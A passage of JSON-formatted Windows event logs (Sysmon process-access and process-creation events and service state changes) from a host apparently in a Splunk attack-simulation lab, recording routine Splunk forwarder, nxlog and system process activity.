C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25dfa|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.921","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-0010E31C0500}","TargetProcessId":"3136","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25dfa|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76856,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The sppsvc service entered the stopped state.","param1":"sppsvc","param2":"stopped","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4043,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:53.422\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:53.422","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76857,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The SplunkForwarder Service service entered the running state.","param1":"SplunkForwarder Service","param2":"running","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4044,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:54.423\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:54.423","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4045,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nProcessGuid: {E2A3D6B1-110B-5F25-0000-00104ED30500}\r\nProcessId: 3884\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","ProcessGuid":"{E2A3D6B1-110B-5F25-0000-00104ED30500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4046,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-110B-5F25-0000-00104ED30500}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-110B-5F25-0000-00104ED30500}","TargetProcessId":"3884","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4047,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-110B-5F25-0000-00104ED30500}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-110B-5F25-0000-00104ED30500}","TargetProcessId":"3884","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4048,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4049,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 